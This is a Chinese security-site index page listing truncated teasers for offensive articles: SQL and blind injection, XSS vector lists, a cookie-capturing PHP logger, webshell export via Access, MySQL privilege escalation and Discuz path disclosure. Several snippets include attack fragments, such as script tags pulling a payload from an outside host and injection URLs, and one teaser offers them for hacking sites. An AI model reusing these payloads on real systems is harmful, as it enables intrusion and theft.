你的位置:聚盟网 >> 网络学院 >> 防护  

    突破伪静态的四种注入方法 [1] [2]

    时间:2012-03-14 浏览:3690 

    伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.bad... [详情]

    PHP又有重大漏洞 多语言拒绝服务漏洞事件预警

    时间:2012-03-14 浏览:4529 

    安全部门监测到目前PHP 5.3.9被黑客发现存在严重的安全漏洞,远程攻击者可以直接利用此漏洞执行任意PHP代码,安全风险非常高。经过跟进,该漏洞(CVE-2012-0830)是由于PHP官方为解决多语言hash漏洞引入... [详情]

    扫描网站敏感目录的js脚本

    时间:2011-10-22 浏览:2601 

    // *========================================================================= // * Intro 扫描网站敏感目录的js脚本 // * Usage 把本脚本wwwcan.js、字典文件Dictionary.txt放在同一目录下 // ... [详情]

    注射攻击可利用变量整理 [1] [2]

    时间:2011-10-22 浏览:785 

    当我们注射mysql库的输入点的时候,可以通过version()/user()/database()/password()等内置函数来得到mysql的相关信息,其实我们在注射的时候可以利用mysql内置的变量来得到更多的mysql信息   其中ver... [详情]

    root用户提权之mysql写入启动项提权

    时间:2011-10-22 浏览:478 [ mysql ]

    实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 "C:\\Documen... [详情]

    双字节编码绕PHP单引号转义又一例: SQL UPDATE注入

    时间:2011-10-22 浏览:661 

    原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》 是一样的。view plaincopy to clipboardprint?<?php// by redice 2010.10.21// 连接mysql数据库$conn=0;$conn = mysql_connect("localho... [详情]

    PHP盲注常用语句

    时间:2011-10-22 浏览:747 

    整理了一些盲注语句,有时候搞站的时候用的着。希望对大家也有用,大牛小牛们用的着就尽管拿吧。 判断版本号: http://www.baidu.com/tmd.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count... [详情]

    77种XSS跨站脚本攻击总结

    时间:2011-10-22 浏览:312 

    1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签... [详情]

    NetBIOS的危害和安全防范

    时间:2011-10-22 浏览:393 

    许多人知道,NetBIOS 是计算机局域网领域流行的一种传输方式,但你是否还知道,对于互联网用户来讲,NetBIOS 则是安全领域的一大隐患。一、 NetBIOS 的烦恼    NetBIOS 是指网络输入输出... [详情]

    XSS截获网站后台路径脚本

    时间:2011-10-22 浏览:505 

    cook.php<?$info = $_SERVER['QUSEY_STRING'];if ($info) {$fp = fopen("info.txt"."a");fwrite($fp.$info."\n");fclose($fp);}?> 使用代码: 插入: <img name="ak" width=0 height=0 bord... [详情]

    ACCESS执行SQL命令导出一句话SHELL

    时间:2011-10-22 浏览:371 

    前几天整个站。好不容易进了后台,发现啥上传啊。备份啊多木有。   webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的   文件。可后台没显示这功能。直接填上文件名字,执行命... [详情]

    DZ 论坛爆路径总结

    时间:2011-10-22 浏览:424 

    1、manyou/admincp.php?my_suffix=%0A%0DSlhack 2、ucenter/control/admin/db.php 3、uc_server/control/admin/db.php 4、forum.php/admin.php’/XXXXXXX.php 5、source/class/class_core.php 摘自... [详情]